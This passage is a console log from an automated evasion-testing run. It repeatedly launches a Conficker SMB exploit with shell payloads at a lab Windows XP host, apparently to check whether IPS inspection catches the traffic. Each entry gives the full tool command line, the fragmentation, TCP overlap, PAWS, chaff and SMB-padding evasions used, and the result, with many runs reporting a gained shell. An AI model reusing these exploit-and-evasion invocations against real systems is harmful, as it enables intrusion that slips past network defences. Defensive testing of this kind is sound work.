  3403. 5980 runs averaging 2.04 runs / second ; progress: 2938/432002015-06-08 00:08:28 INFO
  3404. Success. (10.62.90.116):
  3405. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=53136 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=KkbNMAGYqPk --evasion=[msrpc_bind,msrpc_req]tcp_overlap,"4","new","random_alpha" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"1","268435453","alpharandomized" --verifydelay=1000 --payload=shell
  3406. Info: Using random seed KkbNMAGYqPk
  3407. The following evasions are applied from stage msrpc_bind to msrpc_req:
  3408. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has original payload with alphabetic bytes randomized
  3409. - TCP segments are set to overlap by 4 bytes, with the later packet containing the correct payload. Overlapping part has random alpha bytes as payload
  3410.  
  3411. Info: NetBIOS connection 10.62.90.116:53136 -> 10.35.1.207:445
  3412. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3413. Info: Sending MSRPC request with exploit
  3414. Info: Shell found, attack succeeded
  3415. Info: CommandShell::SendCommand() - Failed to send string
  3416. Info: Command shell connection reset.
  3417. Info: Shell closed
  3418. 0: Success.
  3419. ..................
  3420. 5999 runs averaging 2.04 runs / second ; progress: 2943/43200..2015-06-08 00:08:33 INFO
  3421. Success. (10.62.90.112):
  3422. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62808 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=Y9jHGKPdrkQ --evasion=[msrpc_req,end]smb_writeandxpad,"8","zero" --evasion=[netbios_connect,end]tcp_paws,"1","268435454","random_alpha" --verifydelay=1000 --payload=shell
  3423. Info: Using random seed Y9jHGKPdrkR
  3424. The following evasions are applied from stage netbios_connect to end:
  3425. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alpha bytes as payload
  3426. The following evasions are applied from stage msrpc_req to end:
  3427. - 8 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
  3428.  
  3429. Info: NetBIOS connection 10.62.90.112:62808 -> 10.35.1.207:445
  3430. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3431. Info: Sending MSRPC request with exploit
  3432. Info: Shell found, attack succeeded
  3433. Info: Shell closed
  3434. 0: Success.
  3435. .................................
  3436. 6035 runs averaging 2.05 runs / second ; progress: 2948/43200....................
  3437. 6055 runs averaging 2.05 runs / second ; progress: 2953/43200........2015-06-08 00:08:45 INFO
  3438. Success. (10.62.90.118):
  3439. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=47868 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=xqepctN8ai8 --evasion=[netbios_connect,msrpc_bind]ipv4_frag,"72" --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"7","6","3","random_msrpcbind" --verifydelay=1000 --payload=shell
  3440. Info: Using random seed xqepctN8ai/
  3441. The following evasions are applied from stage netbios_connect to msrpc_bind:
  3442. - IPv4 fragments with at most 72 bytes per fragment
  3443. The following evasions are applied from stage smb_opentree to msrpc_req:
  3444. - Before normal SMB writes, 7 SMB trees are opened and 6 writes are performed to them. The write payload is 3 bytes of MSRPC bind-like data.
  3445.  
  3446. Info: NetBIOS connection 10.62.90.118:47868 -> 10.35.1.207:445
  3447. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3448. Info: Sending MSRPC request with exploit
  3449. Info: Shell found, attack succeeded
  3450. Info: Shell closed
  3451. 0: Success.
  3452. ....2015-06-08 00:08:46 INFO
  3453. Success. (10.62.90.113):
  3454. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33860 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=Ln/5ZlyjG9A --evasion=[smb_opentree,end]smb_decoytrees,"4","6","2","random_msrpcbind" --evasion=[netbios_connect,smb_openpipe]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  3455. Info: Using random seed Ln/5ZlyjG9A
  3456. The following evasions are applied from stage netbios_connect to smb_openpipe:
  3457. - TCP timestamps echo reply value is sent in the wrong endianness
  3458. The following evasions are applied from stage smb_opentree to end:
  3459. - Before normal SMB writes, 4 SMB trees are opened and 6 writes are performed to them. The write payload is 2 bytes of MSRPC bind-like data.
  3460.  
  3461. Info: NetBIOS connection 10.62.90.113:33860 -> 10.35.1.207:445
  3462. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3463. Info: Sending MSRPC request with exploit
  3464. Info: Shell found, attack succeeded
  3465. Info: Shell closed
  3466. 0: Success.
  3467. .........
  3468. 6078 runs averaging 2.05 runs / second ; progress: 2958/43200....
  3469. 6082 runs averaging 2.05 runs / second ; progress: 2963/43200..........
  3470. 6092 runs averaging 2.05 runs / second ; progress: 2968/43200...
  3471. 6095 runs averaging 2.05 runs / second ; progress: 2973/43200........
  3472. 6103 runs averaging 2.05 runs / second ; progress: 2978/43200.........
  3473. 6112 runs averaging 2.05 runs / second ; progress: 2983/43200......
  3474. 6118 runs averaging 2.05 runs / second ; progress: 2988/43200...
  3475. 6121 runs averaging 2.04 runs / second ; progress: 2993/43200.....
  3476. 6126 runs averaging 2.04 runs / second ; progress: 2998/43200...............
  3477. 6141 runs averaging 2.04 runs / second ; progress: 3003/43200................
  3478. 6157 runs averaging 2.05 runs / second ; progress: 3008/43200........
  3479. 6165 runs averaging 2.05 runs / second ; progress: 3013/43200.
  3480. 6166 runs averaging 2.04 runs / second ; progress: 3018/43200.......2015-06-08 00:09:52 INFO
  3481. Success. (10.62.90.113):
  3482. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=48430 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=jheLxOYHTqY --evasion=[msrpc_req,end]ipv4_opt,"3","inc","alpharandomized" --evasion=[smb_opentree,end]tcp_paws,"75%","268435454","alpharandomized" --verifydelay=1000 --payload=shell
  3483. Info: Using random seed jheLxOYHTqa
  3484. The following evasions are applied from stage smb_opentree to end:
  3485. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has original payload with alphabetic bytes randomized
  3486. The following evasions are applied from stage msrpc_req to end:
  3487. - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  3488. The duplicate packet has identical payload except that alphabetic characters are randomized
  3489.  
  3490. Info: NetBIOS connection 10.62.90.113:48430 -> 10.35.1.207:445
  3491. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3492. Info: Sending MSRPC request with exploit
  3493. Info: Shell found, attack succeeded
  3494. Info: Command shell connection reset.
  3495. Info: CommandShell::SendCommand() - Failed to send string
  3496. Info: Shell closed
  3497. 0: Success.
  3498. ..
  3499. 6176 runs averaging 2.04 runs / second ; progress: 3023/43200................
  3500. 6192 runs averaging 2.04 runs / second ; progress: 3028/43200...2015-06-08 00:10:00 INFO
  3501. Success. (10.62.90.116):
  3502. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30613 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=zrd64b/IIsg --evasion=[start,msrpc_req]tcp_chaff,"50%","shorthdr|longhdr","random" --evasion=[smb_opentree,end]tcp_paws,"5","52714395","shuffle" --verifydelay=1000 --payload=shell
  3503. Info: Using random seed zrd64b/IIsj
  3504. The following evasions are applied from stage start to msrpc_req:
  3505. - 50% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
  3506. * TCP header shorter than 20 bytes
  3507. * TCP header longer than packet total size
  3508. * Duplicate packet has random bytes as payload
  3509. The following evasions are applied from stage smb_opentree to end:
  3510. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 52714395> and has shuffled original payload
  3511.  
  3512. Info: NetBIOS connection 10.62.90.116:30613 -> 10.35.1.207:445
  3513. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3514. Info: Sending MSRPC request with exploit
  3515. Info: Shell found, attack succeeded
  3516. Info: CommandShell::SendCommand() - Failed to send string
  3517. Info: Command shell connection reset.
  3518. Info: Shell closed
  3519. 0: Success.
  3520. ...
  3521. 6199 runs averaging 2.04 runs / second ; progress: 3033/43200.......
  3522. 6206 runs averaging 2.04 runs / second ; progress: 3038/43200....
  3523. 6210 runs averaging 2.04 runs / second ; progress: 3044/43200........
  3524. 6218 runs averaging 2.04 runs / second ; progress: 3049/43200
  3525. 6218 runs averaging 2.04 runs / second ; progress: 3054/43200...2015-06-08 00:10:28 INFO
  3526. Success. (10.62.90.116):
  3527. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=64754 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=kJYCaqQqc2Y --evasion=[start,end]tcp_initialseq,"4294967295" --evasion=[smb_opentree,end]tcp_paws,"50%","5765228","alpharandomized" --verifydelay=1000 --payload=shell
  3528. Info: Using random seed kJYCaqQqc2a
  3529. - Initial TCP sequence number is set to 0xffffffff - 4294967295
  3530. The following evasions are applied from stage smb_opentree to end:
  3531. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5765228> and has original payload with alphabetic bytes randomized
  3532.  
  3533. Info: NetBIOS connection 10.62.90.116:64754 -> 10.35.1.207:445
  3534. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3535. Info: Sending MSRPC request with exploit
  3536. Info: Shell found, attack succeeded
  3537. Info: Shell closed
  3538. 0: Success.
  3539. ..
  3540. 6224 runs averaging 2.03 runs / second ; progress: 3059/43200.................
  3541. 6241 runs averaging 2.04 runs / second ; progress: 3064/43200..........
  3542. 6251 runs averaging 2.04 runs / second ; progress: 3069/43200
  3543. 6251 runs averaging 2.03 runs / second ; progress: 3074/43200
  3544. 6251 runs averaging 2.03 runs / second ; progress: 3079/43200.
  3545. 6252 runs averaging 2.03 runs / second ; progress: 3084/43200....
  3546. 6256 runs averaging 2.03 runs / second ; progress: 3089/43200Pid 12828 timed out - killed
  3547. 2015-06-08 00:11:00 INFO
  3548. Timed out (10.62.90.117):
  3549. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22545 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=m9GqZcPtAhc --evasion=[netbios_connect,smb_openpipe]tcp_urgent,"5","random_alpha" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random" --verifydelay=1000 --payload=shell
  3550. Info: Using random seed m9GqZcPtAhe
  3551. The following evasions are applied from stage netbios_connect to smb_openpipe:
  3552. - Add a random alphaurgent data byte to every 5 TCP segment.
  3553. The following evasions are applied from stage smb_opentree to msrpc_bind:
  3554. - Add a random urgent data byte to every 2 TCP segment.
  3555.  
  3556. Info: NetBIOS connection 10.62.90.117:22545 -> 10.35.1.207:445
  3557. Terminated
  3558. .
  3559. 6258 runs averaging 2.02 runs / second ; progress: 3094/43200Pid 13136 timed out - killed
  3560. 2015-06-08 00:11:05 INFO
  3561. Timed out (10.62.90.111):
  3562. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=41641 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=37m4osrLY9M --evasion=[netbios_connect,end]tcp_tsoptreply,"le" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"75%","random_alpha" --verifydelay=1000 --payload=shell
  3563. Info: Using random seed 37m4osrLY9P
  3564. The following evasions are applied from stage netbios_connect to end:
  3565. - TCP timestamps echo reply value is sent in the wrong endianness
  3566. The following evasions are applied from stage smb_openpipe to msrpc_req:
  3567. - 75% probability to add a random alphaurgent data byte to a TCP segment.
  3568.  
  3569. Info: NetBIOS connection 10.62.90.111:41641 -> 10.35.1.207:445
  3570. Terminated
  3571. ....
  3572. 6263 runs averaging 2.02 runs / second ; progress: 3099/43200........
  3573. 6271 runs averaging 2.02 runs / second ; progress: 3104/43200..........
  3574. 6281 runs averaging 2.02 runs / second ; progress: 3109/43200........2015-06-08 00:11:22 INFO
  3575. Success. (10.62.90.117):
  3576. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=54476 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=BY1D6exxlwo --evasion=[start,msrpc_bind]tcp_paws,"13","10","shuffle" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"1","140207545","alphanumrandomized" --verifydelay=1000 --payload=shell
  3577. Info: Using random seed BY1D6exxlwo
  3578. The following evasions are applied from stage start to msrpc_bind:
  3579. - Every 13th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has shuffled original payload
  3580. The following evasions are applied from stage smb_openpipe to msrpc_req:
  3581. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 140207545> and has original payload with alphanumeric bytes randomized
  3582.  
  3583. Info: NetBIOS connection 10.62.90.117:54476 -> 10.35.1.207:445
  3584. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3585. Info: Sending MSRPC request with exploit
  3586. Info: Shell found, attack succeeded
  3587. Info: CommandShell::SendCommand() - Failed to send string
  3588. Info: Command shell connection reset.
  3589. Info: Shell closed
  3590. 0: Success.
  3591. ..
  3592. 6292 runs averaging 2.02 runs / second ; progress: 3114/43200.......
  3593. 6299 runs averaging 2.02 runs / second ; progress: 3119/43200.............
  3594. 6312 runs averaging 2.02 runs / second ; progress: 3124/43200......
  3595. 6318 runs averaging 2.02 runs / second ; progress: 3129/43200...........
  3596. 6329 runs averaging 2.02 runs / second ; progress: 3134/43200.2015-06-08 00:11:45 INFO
  3597. Success. (10.62.90.117):
  3598. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49441 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=z1IpDeH5f6U --evasion=[msrpc_bind,end]tcp_paws,"50%","122942823","random" --evasion=[msrpc_bind,end]tcp_urgent,"13","random" --verifydelay=1000 --payload=shell
  3599. Info: Using random seed z1IpDeH5f6X
  3600. The following evasions are applied from stage msrpc_bind to end:
  3601. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 122942823> and has random bytes as payload
  3602. - Add a random urgent data byte to every 13 TCP segment.
  3603.  
  3604. Info: NetBIOS connection 10.62.90.117:49441 -> 10.35.1.207:445
  3605. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3606. Info: Sending MSRPC request with exploit
  3607. Info: Shell found, attack succeeded
  3608. Info: CommandShell::SendCommand() - Failed to send string
  3609. Info: Command shell connection reset.
  3610. Info: Shell closed
  3611. 0: Success.
  3612. ........
  3613. 6339 runs averaging 2.02 runs / second ; progress: 3139/43200........
  3614. 6347 runs averaging 2.02 runs / second ; progress: 3144/43200......
  3615. 6353 runs averaging 2.02 runs / second ; progress: 3149/43200..
  3616. 6355 runs averaging 2.01 runs / second ; progress: 3154/43200.
  3617. 6356 runs averaging 2.01 runs / second ; progress: 3159/43200........
  3618. 6364 runs averaging 2.01 runs / second ; progress: 3164/43200.......
  3619. 6371 runs averaging 2.01 runs / second ; progress: 3169/43200
  3620. 6371 runs averaging 2.01 runs / second ; progress: 3174/43200
  3621. 6371 runs averaging 2.00 runs / second ; progress: 3179/43200....
  3622. 6375 runs averaging 2.00 runs / second ; progress: 3184/43200.........
  3623. 6384 runs averaging 2.00 runs / second ; progress: 3189/43200....
  3624. 6388 runs averaging 2.00 runs / second ; progress: 3194/43200
  3625. 6388 runs averaging 2.00 runs / second ; progress: 3199/43200
  3626. 6388 runs averaging 1.99 runs / second ; progress: 3204/43200.....Pid 16099 timed out - killed
  3627. 2015-06-08 00:12:58 INFO
  3628. Timed out (10.62.90.110):
  3629. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37388 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=ZvuU2DLSbLs --evasion=[msrpc_req,end]ipv4_opt,"8","inc","shuffle" --evasion=[smb_openpipe,msrpc_req]smb_decoytrees,"4","3","1","zero" --evasion=[smb_openpipe,end]tcp_urgent,"1","random_alpha" --verifydelay=1000 --payload=shell
  3630. Info: Using random seed ZvuU2DLSbLt
  3631. The following evasions are applied from stage smb_openpipe to end:
  3632. - Add a random alphaurgent data byte to every 1 TCP segment.
  3633. The following evasions are applied from stage smb_openpipe to msrpc_req:
  3634. - Before normal SMB writes, 4 SMB trees are opened and 3 writes are performed to them. The write payload is 1 bytes of zeroes.
  3635. The following evasions are applied from stage msrpc_req to end:
  3636. - Every 8th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  3637. The duplicate packet has shuffled payload
  3638.  
  3639. Info: NetBIOS connection 10.62.90.110:37388 -> 10.35.1.207:445
  3640. Terminated
  3641. ...
  3642. 6397 runs averaging 1.99 runs / second ; progress: 3209/43200............
  3643. 6409 runs averaging 1.99 runs / second ; progress: 3214/43200.......
  3644. 6416 runs averaging 1.99 runs / second ; progress: 3219/43200....2015-06-08 00:13:13 INFO
  3645. Success. (10.62.90.118):
  3646. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34064 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=ecbhHa4ykX8 --evasion=[msrpc_bind,end]ipv4_frag,"1416" --evasion=[smb_connect,msrpc_req]tcp_paws,"5","238925499","random_alphanum" --verifydelay=1000 --payload=shell
  3647. Info: Using random seed ecbhHa4ykX9
  3648. The following evasions are applied from stage smb_connect to msrpc_req:
  3649. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 238925499> and has random alphanumeric bytes as payload
  3650. The following evasions are applied from stage msrpc_bind to end:
  3651. - IPv4 fragments with at most 1416 bytes per fragment
  3652.  
  3653. Info: NetBIOS connection 10.62.90.118:34064 -> 10.35.1.207:445
  3654. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3655. Info: Sending MSRPC request with exploit
  3656. Info: Shell found, attack succeeded
  3657. Info: Shell closed
  3658. 0: Success.
  3659.  
  3660. 6421 runs averaging 1.99 runs / second ; progress: 3224/43200.....
  3661. 6426 runs averaging 1.99 runs / second ; progress: 3229/43200...........
  3662. 6437 runs averaging 1.99 runs / second ; progress: 3234/43200.....
  3663. 6442 runs averaging 1.99 runs / second ; progress: 3239/43200..
  3664. 6444 runs averaging 1.99 runs / second ; progress: 3244/43200.Pid 17583 timed out - killed
  3665. 2015-06-08 00:13:38 INFO
  3666. Timed out (10.62.90.115):
  3667. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=35275 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=123aANpGaM8 --evasion=[msrpc_req,end]tcp_overlap,"5","new","random_alphanum" --evasion=[netbios_connect,msrpc_req]tcp_urgent,"50%","random_alphanum" --verifydelay=1000 --payload=shell
  3668. Info: Using random seed 123aANpGaM/
  3669. The following evasions are applied from stage netbios_connect to msrpc_req:
  3670. - 50% probability to add a random alphanumeric urgent data byte to a TCP segment.
  3671. The following evasions are applied from stage msrpc_req to end:
  3672. - TCP segments are set to overlap by 5 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
  3673.  
  3674. Info: NetBIOS connection 10.62.90.115:35275 -> 10.35.1.207:445
  3675. Terminated
  3676. .
  3677. 6447 runs averaging 1.98 runs / second ; progress: 3249/43200.Pid 17709 timed out - killed
  3678. 2015-06-08 00:13:40 INFO
  3679. Timed out (10.62.90.112):
  3680. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17433 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=n87ySzclSe0 --evasion=[smb_opentree,smb_openpipe]netbios_chaff,"8","empty_unspec|empty_keepalive|msrpc_req|broken_length" --evasion=[msrpc_req,end]smb_decoytrees,"2","2","997","random_alphanum" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random_alpha" --verifydelay=1000 --payload=shell
  3681. Info: Using random seed n87ySzclSe2
  3682. The following evasions are applied from stage smb_opentree to smb_openpipe:
  3683. - Before every 8th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  3684. The following evasions are applied from stage smb_openpipe to end:
  3685. - 75% probability to add a random alphaurgent data byte to a TCP segment.
  3686. The following evasions are applied from stage msrpc_req to end:
  3687. - Before normal SMB writes, 2 SMB trees are opened and 2 writes are performed to them. The write payload is 997 random alphanumeric bytes.
  3688.  
  3689. Info: NetBIOS connection 10.62.90.112:17433 -> 10.35.1.207:445
  3690. Terminated
  3691. .....
  3692. 6454 runs averaging 1.98 runs / second ; progress: 3254/43200........
  3693. 6462 runs averaging 1.98 runs / second ; progress: 3259/43200.....
  3694. 6467 runs averaging 1.98 runs / second ; progress: 3264/43200........Pid 18131 timed out - killed
  3695. 2015-06-08 00:13:58 INFO
  3696. Timed out (10.62.90.119):
  3697. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39853 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=AwsTHx1TWIM --evasion=[smb_connect,end]smb_writeandxpad,"8","zero" --evasion=[smb_openpipe,msrpc_req]tcp_chaff,"5","chksum|nullchksum|nullflag|outofwindow|shorthdr|longhdr","random_alpha" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
  3698. Info: Using random seed AwsTHx1TWIM
  3699. The following evasions are applied from stage smb_connect to end:
  3700. - 8 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
  3701. The following evasions are applied from stage smb_openpipe to msrpc_req:
  3702. - With every 5 TCP packet a TCP chaff packet is sent. The chaff packet has:
  3703. * Invalid TCP checksum.
  3704. * NULL TCP checksum.
  3705. * NULL TCP control flags.
  3706. * An out-of-window sequence number.
  3707. * TCP header shorter than 20 bytes
  3708. * TCP header longer than packet total size
  3709. * Duplicate packet has random alpha bytes as payload
  3710. - 25% probability to add a zero urgent data byte to a TCP segment.
  3711.  
  3712. Info: NetBIOS connection 10.62.90.119:39853 -> 10.35.1.207:445
  3713. Terminated
  3714. ....
  3715. 6480 runs averaging 1.98 runs / second ; progress: 3269/43200.....
  3716. 6485 runs averaging 1.98 runs / second ; progress: 3274/43200
  3717. 6485 runs averaging 1.98 runs / second ; progress: 3279/43200..
  3718. 6487 runs averaging 1.98 runs / second ; progress: 3284/43200...........
  3719. 6498 runs averaging 1.98 runs / second ; progress: 3289/43200..............
  3720. 6512 runs averaging 1.98 runs / second ; progress: 3294/43200...
  3721. 6515 runs averaging 1.97 runs / second ; progress: 3299/43200
  3722. 6515 runs averaging 1.97 runs / second ; progress: 3304/43200.....
  3723. 6520 runs averaging 1.97 runs / second ; progress: 3309/43200...2015-06-08 00:14:42 INFO
  3724. Success. (10.62.90.112):
  3725. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=28413 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=roD2a76i9NE --evasion=[msrpc_bind,end]tcp_paws,"75%","268435453","zero" --evasion=[msrpc_bind,msrpc_req]tcp_seg,"4" --verifydelay=1000 --payload=shell
  3726. Info: Using random seed roD2a76i9NG
  3727. The following evasions are applied from stage msrpc_bind to end:
  3728. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has 0x00 bytes as payload
  3729. The following evasions are applied from stage msrpc_bind to msrpc_req:
  3730. - TCP packets are segmented to contain at most 4 bytes of payload.
  3731.  
  3732. Info: NetBIOS connection 10.62.90.112:28413 -> 10.35.1.207:445
  3733. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3734. Info: Sending MSRPC request with exploit
  3735. Info: Shell found, attack succeeded
  3736. Info: Shell closed
  3737. 0: Success.
  3738. ...
  3739. 6527 runs averaging 1.97 runs / second ; progress: 3314/43200.2015-06-08 00:14:46 INFO
  3740. Success. (10.62.90.112):
  3741. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22205 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=yAqSbF7a2AM --evasion=[msrpc_req,end]ipv4_frag,"24" --evasion=[start,end]tcp_paws,"3","8","random_alpha" --evasion=[smb_openpipe,msrpc_req]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  3742. Info: Using random seed yAqSbF7a2AP
  3743. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random alpha bytes as payload
  3744. The following evasions are applied from stage smb_openpipe to msrpc_req:
  3745. - TCP timestamps echo reply value is sent in the wrong endianness
  3746. The following evasions are applied from stage msrpc_req to end:
  3747. - IPv4 fragments with at most 24 bytes per fragment
  3748.  
  3749. Info: NetBIOS connection 10.62.90.112:22205 -> 10.35.1.207:445
  3750. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3751. Info: Sending MSRPC request with exploit
  3752. Info: Shell found, attack succeeded
  3753. Info: Shell closed
  3754. 0: Success.
  3755. ...
  3756. 6532 runs averaging 1.97 runs / second ; progress: 3319/43200....
  3757. 6536 runs averaging 1.97 runs / second ; progress: 3324/43200.......
  3758. 6543 runs averaging 1.97 runs / second ; progress: 3329/43200..
  3759. 6545 runs averaging 1.96 runs / second ; progress: 3334/43200
  3760. 6545 runs averaging 1.96 runs / second ; progress: 3339/43200
  3761. 6545 runs averaging 1.96 runs / second ; progress: 3344/43200.
  3762. 6546 runs averaging 1.95 runs / second ; progress: 3349/43200
  3763. 6546 runs averaging 1.95 runs / second ; progress: 3354/43200Pid 19330 timed out - killed
  3764. 2015-06-08 00:15:29 INFO
  3765. Timed out (10.62.90.116):
  3766. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=53161 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=oMEwt4ZkuNY --evasion=[smb_connect,msrpc_bind]smb_chaff,"75%","write_flag","msrpc" --evasion=[smb_openpipe,msrpc_req]tcp_segvar,"5","51454" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"50%","zero" --verifydelay=1000 --payload=shell
  3767. Info: Using random seed oMEwt4ZkuNa
  3768. The following evasions are applied from stage smb_connect to msrpc_bind:
  3769. - 75% probability to send an SMB chaff message before real messages. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
  3770. The following evasions are applied from stage smb_openpipe to msrpc_req:
  3771. - TCP packets are segmented to contain between 5 and 51454 bytes of payload.
  3772. - 50% probability to add a zero urgent data byte to a TCP segment.
  3773.  
  3774. Info: NetBIOS connection 10.62.90.116:53161 -> 10.35.1.207:445
  3775. Terminated
  3776.  
  3777. 6547 runs averaging 1.95 runs / second ; progress: 3359/43200.........
  3778. 6556 runs averaging 1.95 runs / second ; progress: 3364/43200..Pid 19484 timed out - killed
  3779. 2015-06-08 00:15:36 INFO
  3780. Timed out (10.62.90.113):
